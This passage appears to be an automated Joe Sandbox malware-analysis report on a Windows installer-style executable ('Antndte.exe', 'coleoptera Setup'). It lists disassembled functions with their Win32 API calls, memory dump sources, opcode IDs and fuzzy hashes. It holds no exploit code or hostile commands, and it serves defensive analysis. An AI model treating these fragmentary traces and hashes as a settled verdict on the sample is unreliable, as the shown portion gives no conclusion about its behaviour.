                                                                                                                                • Instruction Fuzzy Hash: D5D0A773F141008BD710EBB8BE8949E73F8E7803293208837E102F11D1E578C8428A1C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocGlobal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404D58
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405092
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                                                                                                • InvalidateRect.USER32(?,00000000,?), ref: 004051E3
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00405231
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405243
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: 4909c554b477d7fce48901accb9bd62bbb6df313777705d4a47095eaf0212305
                                                                                                                                • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                                                                                                • Opcode Fuzzy Hash: 4909c554b477d7fce48901accb9bd62bbb6df313777705d4a47095eaf0212305
                                                                                                                                • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                                                                                                  • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                                                                                  • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                                                                                  • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                                                                                  • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                                                                                  • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                                                                                  • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                                                                                  • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                                                                                  • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp\Undige$Call
                                                                                                                                • API String ID: 2624150263-221836030
                                                                                                                                • Opcode ID: ec3971bbc8931d685fb004cabfc7b88105e39a671845926ac38a8e6a396fdf49
                                                                                                                                • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                                                                                                • Opcode Fuzzy Hash: ec3971bbc8931d685fb004cabfc7b88105e39a671845926ac38a8e6a396fdf49
                                                                                                                                • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: p!C$p!C
                                                                                                                                • API String ID: 0-3125587631
                                                                                                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                                                                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00406ADD Relevance: .3, Instructions: 334COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                                                                • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                                                                                                • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                                                                • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404452
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404483
                                                                                                                                • GetSysColor.USER32(?), ref: 00404494
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404537
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045B6
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                                                                                • SetCursor.USER32(00000000), ref: 004045D2
                                                                                                                                • SendMessageW.USER32(00000111,?,00000000), ref: 00404601
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                • String ID: +C@$Call$N
                                                                                                                                • API String ID: 3103080414-3697844480
                                                                                                                                • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                                                                                • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                                                                                                • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                                                                                • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,coleoptera Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F$coleoptera Setup
                                                                                                                                • API String ID: 941294808-2531181823
                                                                                                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                                                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                                                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                                                                  • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                                                                                • wsprintfA.USER32 ref: 00405F4D
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                                                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                • Opcode ID: e9e028425c837c753a03fdef0a01934527d0e92a4020d6044e6bdb5cca473c88
                                                                                                                                • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                                                                                                • Opcode Fuzzy Hash: e9e028425c837c753a03fdef0a01934527d0e92a4020d6044e6bdb5cca473c88
                                                                                                                                • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
